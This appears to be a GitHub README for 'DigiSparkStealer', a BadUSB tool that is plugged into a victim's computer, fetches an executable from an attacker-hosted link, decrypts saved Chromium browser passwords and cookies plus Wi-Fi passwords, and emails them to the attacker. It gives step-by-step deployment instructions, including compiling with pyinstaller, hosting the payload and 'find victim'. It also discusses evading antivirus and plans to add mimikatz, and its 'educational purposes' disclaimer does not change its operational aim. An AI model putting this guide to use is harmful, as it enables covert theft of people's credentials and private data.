This project allows you to steal passwords and cookies of the victim by inserting a Digispark Attiny85, ATMEGA32U4 or another programming controller with this software and after few seconds you have all the data by mail
Just plug BadUSB and get all data
!!! Due to large increase of visitors number, I have to delete the source code of stealer for the safety of the other people. !!!
Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB
All your data when working with a browser is cached. Since popular browsers like Chrome, Opera or Yandex Browser are chromium based browsers, all stored data on a computer has a similar structure.
The interesting for us data collected in database SQLite. The url, login fields are stored explicitly, but password must be decrypted by win32crypt. This type of encryption means that passwords can be extended only on the client’s computer and nowhere else. We run our program on the client, it uses the client's keys to decrypt passwords and send the decrypted data to our email. Moreover, we can also send cookies and another useful information.
For example, to get all the saved passwords from earlier connected Wi-Fi networks, you just need to type the command:
netsh wlan show profiles
It displays a list of all saved networks. For each network, you must write a command with name (ESSID) of the network. You can read more here
This way we get more victims information. Mac-addresses also can be extracted, using ipconig /all
During the implementation of this idea, I created 2 versions of the script.
- Based on Nirsoft program
- Python script
First version is based on Nirsoft program - ChromePass
This software is very convenient and has own advantages. The company has developed software for recovering forgotten passwords. To see your passwords, you just need to run the program and get all your passwords saved on the PC in the "Login Data" file. Most antivirus programs, including Windows Defender, block this file, so most likely the result of this script is poor. Here is report. A PC with a disabled protector and no antivirus is required.
Remember that it only steals Chrome passwords. No more!!!
Advantages:
- Fast download. Executable file is <1Mb. Can be used in case of bad internet at the victim.
- Simple presentation of the report in csv, html text forms.
Disadvantages:
- High probability of launch blocking
Based on the fact that antivirus programs define chrompass as malicious and do not allow it to be run, I had to write a program myself that receives all the data. Thanks @hassaanaliw for the source code and idea. My modified code sends data to the mail, while in the previous version of the program a powershell was involved in SMTP server creation.
Advantages:
- Not blocked by firewall
- Steals WI-FI passwords
- Works not only with Chrome, but also with Opera and Yandex
- Simple w3-style css report.
Disadvantages:
- Big executable file (5Mb)
- Buy Digispark ATtiny85
- Install Arduino IDE for Digispark
- Download this repo
Linux:
$ git clone https://github.com/kovinevmv/DigiSparkStealer
$ cd DigiSparkStealer
Windows: Click on green button on right top of main page. Then - "Download Zip"
- Replace your mail, password from the mail and the recipient with your data here
- Compile your code by pyinstaller to create executable file
pyinstaller --onefile mystealer.py
- Upload executable file from dist to Internet (like git or DropBox)
- Replace LINK_TO_EXE with your url here
- Run sketch in Arduino IDE, plug Digispark Attiny85
- Find victim)
- Switch the keyboard layout to English.
- Internet is required on the victim's computer
- Integrate mimikatz to extract passwords from windows.
- Rewrite WI-FI password grabber to powershell script, to get all the passwords including those requiring administrator rights.
- Fix Yandex Browser